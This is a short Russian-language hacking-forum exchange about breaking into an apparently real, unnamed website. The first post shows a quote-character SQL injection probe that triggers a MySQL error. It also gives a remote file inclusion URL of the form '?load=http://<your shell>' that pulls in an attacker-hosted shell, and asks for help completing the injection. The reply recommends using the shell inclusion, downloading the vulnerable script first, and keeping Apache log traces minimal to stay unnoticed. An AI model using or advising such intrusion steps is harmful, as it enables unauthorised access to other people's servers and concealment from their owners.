Нашел этот сайт смотри тута потом сделал вот http://наш сайт.com/?show=item&item=%D1%8D&cur=' и видим Query Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 видать,дело пахнет керосином...а вот если сделать http://этот сайт.com/?load=http://ваш шелл то вообще весело помогите довести sql до конца
если есть возможность заинклудить шелл, то зачем мудохатся с инъекцией? А если так уж охота провести инъекцию, то я в твоем случае для начала сливаю сам скрипт в котором потенциальная бага, ищу есть ли там ошибка, и только потом организовую атаку. На апаче ведь логи ведутся, и чем меньше наследишь тем больше вероятность остаться незамеченным. ЗЫ. Кстати даже если ты можешь влиять на запрос, то не всегда есть возможность напакостить. Порой стоят оч неплохе фильтры.
